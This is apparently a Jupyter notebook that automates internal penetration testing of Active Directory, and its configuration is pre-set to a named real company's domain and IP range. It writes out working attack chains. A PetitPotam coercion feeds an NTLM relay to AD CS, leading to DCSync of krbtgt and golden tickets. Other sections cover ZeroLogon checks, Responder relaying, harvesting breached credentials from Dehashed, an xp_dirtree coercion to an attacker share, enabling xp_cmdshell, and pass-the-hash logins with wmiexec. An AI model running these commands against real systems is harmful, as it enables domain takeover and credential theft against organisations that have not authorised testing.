# Description
Automating internal penetration testing or at least creating a checklist. If everything goes well, you will have DA!

# Setup
Prior to running any cells assign a value to the variables and run the cell. This will change the targets for enumeration without needing to modify the script parameters. 

In [ ]:
SCAN_TYPE = "A" #P=Passive, no interaction with the org's assets (except DNS requests). N=Normal, non-malicious TCP/HTTP requests sent. A=Aggressive, a number of malicious HTTP requests sent for vulnerability identification.
DOMAIN = "tesla.com"  #FQDN (required)
IP_RANGE = "184.30.18.0/24" #nmap format. If empty, the IPs of subdomains will be used
ORG_NAME = "tesla"  #this will be used in linkedIn search and cloud enumeration (required)
FOLDER_NAME = "tesla" #this folder will contain the discovered recon data (required)
USERNAME_FORMAT = "{f}{last}" #e.g. {f}{last}, check hunter.io if you're not sure about the email format
DEHASHED_USER = "" #dehashed username
DEHASHED_KEY = ""  #dehashed API Key
DOMAIN_USER = "" #if you have a domain username or managed to compromise one during the engagement
DOMAIN_Password = "" #password for the above user

In [ ]:
print("Setting up project folders and files")
!mkdir $FOLDER_NAME
!nmap -sL -n $IP_RANGE | grep 'Nmap scan report for' | cut -f 5 -d ' ' > $FOLDER_NAME/IP_Range.txt
!mkdir $FOLDER_NAME/Screenshots
print ("Done!")

# NMAP (Unauthenticated)
All port scan is not included as it may take a while, add flags as per your requirements.

In [ ]:
if IP_RANGE != "" and SCAN_TYPE != "P":
        !nmap -Pn $IP_RANGE >> $FOLDER_NAME/nmap.txt

# Identify DCs and Check For Common Vulns (Unauthenticated)

We can use nslookup on our host machine (Windows) to find DC:  nslookup -type = SRV _ldap._tcp.dc._msdcs.//DOMAIN/



### Kerbrute 

It can used to identify Kerberos servers: https://github.com/ropnop/kerbrute

In [ ]:
!echo testuser > $FOLDER_NAME/username.txt
!kerbrute userenum -d $DOMAIN username.txt | cut -d> -f2 |cut -d: -f1|tr -d ' '|anew $FOLDER_NAME/DCs.csv
print("Finding DCs IP addresses... ")
!dnsx -silent -a -resp -l $FOLDER_NAME/DCs.csv|cut -d " " -f 2|cut -d "]" -f 1 |cut -d "[" -f 2 >> $FOLDER_NAME/DCs_IP.csv
!rm $FOLDER_NAME/username.txt

### ZeroLogon

Script: https://github.com/rth0pper/zerologon

You'd need to enter NETBIOS Name of the target DC. The following script will only check for the first DC in DCs_IPs.csv (it will not exploit the vulnerability).

In [2]:
!DC=$(head -n 1 $FOLDER_NAME/DCs_IP.txt)
!python3 zerologon.py NETBOIS_NAME $DC

head: cannot open '/DCs_IP.txt' for reading: No such file or directory
python3: can't open file 'zerologon.py': [Errno 2] No such file or directory


# PetitPotam -> NTLM relay to ADCS -> DA (Unauthenticated)

### How it works

This attack utilizies two vulnerabilities, MS-EFSRPC – AKA PetitPotam and Credential Relaying abusing the AD CS role. An attacker can trigger a Domain Controller using PetitPotam to NTLM relay credentials to a host of choice. The Domain Controller’s NTLM Credentials can then be relayed to the Active Directory Certificate Services (AD CS) Web Enrollment pages, and a DC certificate can be enrolled. This certificate can then be used to request a TGT (Ticket Granting Ticket) and compromise the entire domain through Pass-The-Ticket. 

Below provides a high level overview of how the attack works:
* Setup an NTLM relay listener on a box you control, so that incoming authentications are relayed to the misconfigured ADCS;
* Force the target DC to authenticate (using PetitPotam or PrintSpooler trick) to the box running your NTLM relay;
* Target DC attempts to authenticate to your NTLM relay;
* NTLM relay receives the DC\$ machine account authentication and relays it to the ADCS;
* ADCS provides a certificate for the target DC\$ computer account;
* Use the target DC's computer account certificate to request its Kerberos TGT;
* Use target DC's computer account TGT to perform DCSync and pull the NTLM hash of krbtgt;
* Use krbtgt NTLM hash to create Golden Tickets that allow you to impersonate any domain user, including Domain Admin.

Below are some of the conditions making an AD environment vulnerable to ADCS + NTLM relay attack:
* ADCS is configured to allow NTLM authentication;
* NTLM authentication is not protected by EPA or SMB signing;
* ADCS is running either of these services:
  * Certificate Authority Web Enrollment
  * Certificate Enrollment Web Service

References: 
* [Dirk-jan Mollema: NTLM relaying to AD CS - On certificates, printers and a little hippo](https://dirkjanm.io/ntlm-relaying-to-ad-certificate-services/)
* [Truesec: Using PetitPotam to NTLM Relay to Domain Administrator ](https://www.truesec.com/hub/blog/from-stranger-to-da-using-petitpotam-to-ntlm-relay-to-active-directory)
* [ADCS + PetitPotam NTLM Relay: Obtaining krbtgt Hash with Domain Controller Machine Certificate](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/adcs-+-petitpotam-ntlm-relay-obtaining-krbtgt-hash-with-domain-controller-machine-certificate)
* https://github.com/topotam/PetitPotam
* https://github.com/gentilkiwi/mimikatz
* https://github.com/gentilkiwi/kekeo

### Step 1 - Find AD CS

Check if DC has a web service running, use it's certificate to find out AD CS?

We can also use certify.exe to enumerate certificate templates and find vulnerabilities: https://github.com/GhostPack/Certify

### Step 2 - Start ntlmrelay for relaying hashes to the AD CS
Run the following command outside of docker, jupyter does not allow executing of parrallel cells.

sudo python3 ntlmrelayx.py -debug -smb2support --target http://ADCS/certsrv/certfnsh.asp --adcs --template DomainController

If above command results in error related to templates, try other templates such as "KerberosAuthentication" or "Computer" or "User"

### Step 3 - PetitPotam to force the target DC to authenticate to our attacking box
The below is targetting only first DC in the DCs_IP list.

Note: there are several other ways to trigger NTLM authentication, including Responder, mitm6, PrinterBug, PrintNightmare, etc.)

After execution running it, check your ntlmrelay terminal, it should've relayed hash to ADCS and obtained a certificate



In [ ]:
!DC=$(head -n 1 $FOLDER_NAME/DCs_IP.txt)
!python3 Petitpotam.py <listener> $DC  #fillout the attacking box IP where ntlmrelay is running

### Step 4 - Mimikatz and Keko for TGT request, the following needs to be done in Windows

Check this out demo from Benjamin Deply: https://user-images.githubusercontent.com/2307945/126882835-eb32d87d-e010-4e1f-9067-784ac838f93c.gif

**KEKO for requesting TGT for our compromised DC machine account**
* curl https://github.com/gentilkiwi/kekeo/releases/download/2.2.0-20210723/kekeo.zip -o kekeo.zip
* tar -xf .\kekeo.zip
* .\x64\kekeo.exe
* base64 /input:on
* tgt::ask /pfx:\<base64 cert from relay\> /user:dc-101$ /domain:spencer.local /ptt
* exit

**Mimikatz for DCSync**
* curl https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20210724/mimikatz_trunk.zip -o mimikatz.zip
* tar -xf mimikatz.zip
* .\x64\mimikatz.exe
* lsadump::dcsync /domain:spencer.local /user:krbtgt # note down the ntlm hash
* lsadump::dcsync /domain:spencer.local /user:\<any user\>  #better request administrator's hash 
* exit

### Step 5 - Login to DC

Again several ways, but wmiexec may be the stealthiest!

In [ ]:
!DC=$(head -n 1 $FOLDER_NAME/DCs_IP.txt)
!wmiexec.py -hashes :<NT HASH> $DOMAIN/<USER>@$DC

# Relaying hashes using Responder and NTLMRelayx

### RunFinger

Let's first find out which hosts do not require SMB singning:

In [ ]:
!RunFinger.py -i TARGET_SUBNET | grep -B1 'Signing: False' |cut -f 4 -d ' ' |grep -oE "([0-9]{1,3}\.){3}[0-9]{1,3}" >> noSMBSigning.txt

### Responder and ntlmrelayx

Use other notebooks to start Responder and ntlmrelayx. Command are below (Remmebr to turn off SMB server in /etc/responder/responder.conf. ):

*sudo impacket-responder -I eht0*

*impacket-ntlmrelayx -debug -smb2support -tf noSMBSigning.txt --no-http-server -socks --output-file ntlmrelayx.logs*

# User Enumeration (Unauthenticated/Authenticted)

Few ways ways to enumerate users. Scraping from Linked, quering SAMRPC and finding users from breached databases. 

### User Enumeration from Linked
CrossLinked: https://github.com/m8r0wn/CrossLinked

Searching users on LinkedIn and creating email. 

For better results, run the following cell multiple times. Try different permutations of the company name, check company's linkedin page and try that name!

In [ ]:
if EMAIL_FORMAT != "":
    print("Finding users on LinkedIn... ")
    !python3 ../crosslinked/crosslinked.py -f $EMAIL_FORMAT $ORG_NAME -o crosslinked.csv
    !cat crosslinked.csv |sort -u |anew $FOLDER_NAME/Users.csv
    !rm crosslinked.csv
    print("Done. The file ./{}/Emails.csv is updated!".format(FOLDER_NAME))

### User Enumeration from SAMRPC

The SAMRPC protocol makes it possible for a low privileged user (or an unauthenticatd user if misconfigured) to query a machine on a network for data. For example, a user can use SAMRPC to enumerate users, including privileged accounts such as local or domain administrators, or to enumerate groups and group memberships from the local SAM and Active Directory. The following command can help enumerating users (you can execute it even without the creds). It will try one of the DCs (first one in the list of DCs_IP.txt), try other DCs if it coudn't call SAMRPC.

Reference: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/network-access-restrict-clients-allowed-to-make-remote-sam-calls

In [ ]:
print("Querying DC to enumerate users... ")
!DC=$(head -n 1 $FOLDER_NAME/DCs_IP.txt)
!crackmapexec smb $DC -u $DOMAIN_USER -p $DOMAIN_PASSWORD --users | grep $DOMAIN |cut -d\\ -f2 |anew $FOLDER_NAME/Users.csv

### Breached database from Dehashed

https://dehashed.com

It will harvest credentials from breached databases, the Dehashed username and API key is required.  


In [ ]:
%%bash  -s "$DOMAIN" "$DEHASHED_USER" "$DEHASHED_KEY" "$FOLDER_NAME"
if [ "$3" != "" ]; then
echo "Dumping breached databses from dehashed ..."
echo "id, email, username, password, hashed_password, name, database_name" >> $4/Dehashed.csv
curl "https://api.dehashed.com/search?query=domain:$1&size=4000" -u $2:$3 -H 'Accept: application/json' | jq -r '.entries[] | {id: .id,email: .email,username: .username,password: .password,hashed_password: .hashed_password,name: .name,database_name: .database_name} | select((.password != null and .password!= "") )' | jq -r '[.[]] | @csv'|anew $4/Dehashed.csv
echo "Done. $4/Dehashed.csv is updated!"
echo "Updating Email.csv with newly found Email addresses!"
grep -E -o "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b" $4/Dehashed.csv |cut -d@ -f1|anew $4/Users.csv
fi

### Valid Users

Using kerbrute: https://github.com/ropnop/kerbrute


In [ ]:
!./kerbrute userenum -d $DOMAIN $FOLDER_NAME/Users.csv |grep "VALID" |grep -E -o "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b" |cut -d@ -f1|anew $FOLDER_NAME/Valid_Users.csv

# Web Stuff (Unauthenticated)

### HTTP Probing
Probing in-scope domains using httpx: https://github.com/projectdiscovery/httpx

In [ ]:
if SCAN_TYPE != "P":
    print("Probing using httpx...")
    if IP_RANGE == "":   
        !cp $FOLDER_NAME/Subdomains.csv subs.csv
        !cat subs.csv |dnsx -silent |httpx -p -silent >> httpx.csv
        !cat httpx.csv |anew $FOLDER_NAME/Probed_Subdomains.csv
        print("Done. The file ./{}/Probed_Subdomains.csv is updated!".format(FOLDER_NAME))
    else:
        !cp $FOLDER_NAME/In_Scope_Subdomains.csv subs.csv
        !cat subs.csv |dnsx -silent|httpx -silent >> httpx.csv
        !cat httpx.csv |anew $FOLDER_NAME/Probed_In_Scope_Subdomains.csv
        print("Done. The file ./{}/Probed_In_Scope_Subdomains.csv is updated!".format(FOLDER_NAME))
    !rm subs.csv
    !rm httpx.csv

### Screenshoting

Eyewitness: https://github.com/FortyNorthSecurity/EyeWitness

In [ ]:
%%bash -s "$IP_RANGE" "$FOLDER_NAME" "$SCAN_TYPE"
if [ "$3" != "P" ]; then
echo "Screenthoting probed domians using EyeWitness..."
if [ "$1" == "" ]; then
    cp $2/Probed_Subdomains.csv subs.csv
    python3 ../EyeWitness/Python/EyeWitness.py --delay 2 --no-prompt -f subs.csv -d $2/Screenshots/
    echo "Done. The screenshots for Probed_Subdomains are saved in ./$2/screenshots/report.html"
else 
    cp $2/Probed_In_Scope_Subdomains.csv subs.csv
    python3 ../EyeWitness/Python/EyeWitness.py --delay 2 --no-prompt -f subs.csv -d $2/Screenshots/
    echo "Done. The screenshots for Probed_In_Scope_Subdomains are saved in ./{}/screenshots/report.html"
fi
rm subs.csv
fi

### Nuclei Scan
Nuclei is a web scanner, it can detect technologies in use, identify CORS and TLS issues, and can scan for famous zero days such as log4j. Give it a go, it's pretty good!

**This might take sometime depending on the number of domains. It is a bit noisey, may send hundreds of GET/POST requests, be careful in a red team engagement.**

Nuclei: https://github.com/projectdiscovery/nuclei

In [ ]:
if SCAN_TYPE == "A":
    print("Scanning probed domains using nuclei...")
    !nuclei -update
    !nuclei -update-templates #let's first update nuclei database
    if IP_RANGE == "":
        !cp $FOLDER_NAME/Probed_Subdomains.csv subs.csv
        !nuclei -l subs.csv |anew $FOLDER_NAME/Nuclei.txt
        print("Done. Nuclei resuts for Probed_Subdomains saved in  ./{}/Nuclei.txt".format(FOLDER_NAME))
    else:
        !cp $FOLDER_NAME/Probed_In_Scope_Subdomains.csv subs.csv
        !nuclei -l subs.csv |anew $FOLDER_NAME/Nuclei.txt
        print("Done. Nuclei resuts for Probed_In_Scope_Subdomains saved in  ./{}/Nuclei.txt".format(FOLDER_NAME))
    !rm subs.csv        
    print("Note: Nuclei.txt will not be part of final excel file!")

# MSSQL Adventures (Unauthenticated/Authenticated)

### Find servers and check guest access

It can be executed without credentials.

In [ ]:
!crackmapexec mssql IP_Range.txt -u $DOMAIN_USER -p $DOMAIN_PASSWORD

### Capture MSSQL Service Account Hash via xp_dirtree

Usually all domains users can login to MSSQL servers. We can use a domain account and coerce the server to talk to our attacking machine using xp_dirtree stored procedure. Once the NTLMv2 challenge-response is captured, we can relay it to other hosts where SMB sining is not enabled or try cracking the passowrd.

**Use MSSQL client to login:**

*impacket-mssql \\$DOMAIN/\\$DOMAIN_USER@SQL-SERVER-IP -windows-auth*


For capturing the NTLMv2 challenge-response. **On attacking machine:** 

*impacket-smbserver ShareName ./*

For relaying hashes to other hosts. **On attacking machine:**

*impacket-ntlmrelayx -debug -smb2support -tf noSMBSigning.txt --no-http-server -socks --output-file ntlmrelayx.logs*

**On MSSQL terminal:**

*exec MASTER.sys.xp_dirtree "\\\ATTACKING-IP\\ShareName", 1,1;*



### MSSQL Enum

Check if impersonation is enabled, can be abused if a user can impersonate DBO:

*SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE';*

Find linked servers:

*EXEC sp_linkedservers;*

Check version and system user on linked servers:

*select version from openquery("SERVER-NAME", 'select @@version as version');
select version from openquery("SERVER-Name", 'select system_user as version');*


If xp_cmdshell is disabled and user has impersonation:

*EXECUTE AS LOGIN = 'sa';
EXEC sp_configure 'show advanced options', 1;RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
EXEC xp_cmdshell whoami*

# Excel and ZIP

In [ ]:
!sudo pip3 install pandas

import pandas as pd
import os
import csv
import glob
import xlsxwriter
import openpyxl


#path to parse to and read files from
path = "/home/discovery/work/{}/".format(FOLDER_NAME)

#all files ending in .csv
all_files = glob.glob(os.path.join(path, "*.csv"))

#initialize writer
writer = pd.ExcelWriter('/home/discovery/work/' + FOLDER_NAME + '/' + FOLDER_NAME + '_OSINT.xlsx', engine='xlsxwriter', options={'strings_to_formulas': False})

#write all files into excel from dataframes and name worksheet by filename 
print("The following files are being parsed to " + path + ":") 
print("")
for f in all_files:
    if os.stat(f).st_size == 0:
        pass
    else:
        df = pd.read_csv(f)
        print(f)
        df.to_excel(writer, sheet_name=os.path.basename(f),index=False)

writer.save()  

print("")
print("Parsing of " + FOLDER_NAME + "_OSINT.xlsx Complete")


#delete csv files if excel creation was successful
if os.path.exists('/home/discovery/work/' + FOLDER_NAME + '/' + FOLDER_NAME + '_OSINT.xlsx'):
    !rm $FOLDER_NAME/*.csv

#create zip file containing all the results
import shutil
shutil.make_archive('/home/discovery/work/' + FOLDER_NAME, 'zip', '/home/discovery/work/' + FOLDER_NAME)
print("Results saved in " + FOLDER_NAME + ".zip in ~/work")